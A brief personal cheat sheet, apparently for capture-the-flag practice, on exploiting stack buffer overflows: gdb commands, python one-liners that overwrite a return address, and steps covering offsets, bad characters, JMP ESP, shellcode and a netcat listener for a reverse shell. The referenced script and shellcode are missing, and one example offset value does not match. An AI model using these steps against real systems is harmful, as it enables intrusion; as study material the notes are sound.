Buffer Overflow

Reminders

readelf -l <program>

(gdb) disas main

(gdb) break *0x08048550

(gdb) x/xw $esp

(gdb) x/4i 0xb7e04e81

(gdb) continue

(gdb-peda) dumpargs

run <<< $(python -c 'print("A" * 40 + "\xef\xbe\xad\xde")')

(python -c 'print("A" * 40 + "\xef\xbe\xad\xde")'; /bin/cat) | ./ch13

Methodology

Generate a bunch of characters to overflow the input:

msf-pattern_create -l 5000

Then check the EIP value, for example 31704330 :

msf-pattern_offset -l 5000 -q 31700433

Now we know where is the EIP, for example we have an exact match at offset 2012.

This simple python script should overwrite the EIP with the value of 4 * B = 42 42 42 42.

Use badchars in our script now:

Check the ESP address in memory and see the chars and look if there is badchars, otherwise there is only \x00.

Then check memory protection thanks to readelf -l <program>

Find the address which contain \xff\xe4 (=JMP ESP) on the target. Check the addresses and try them.

Remove bad chars on our script and add the payload with the address and modify the message.

Put a breakpoint at this address and write a shellcode with bad characters (here only \x00), for example :

Care about the size, the payload can't be too big.

Add the payload to the script, don't forget to put a b before and send it in the message.

Also add some characters between the address and the payload.

Set up the listener : nc -lvp 1234

Cross your fingers, it should works.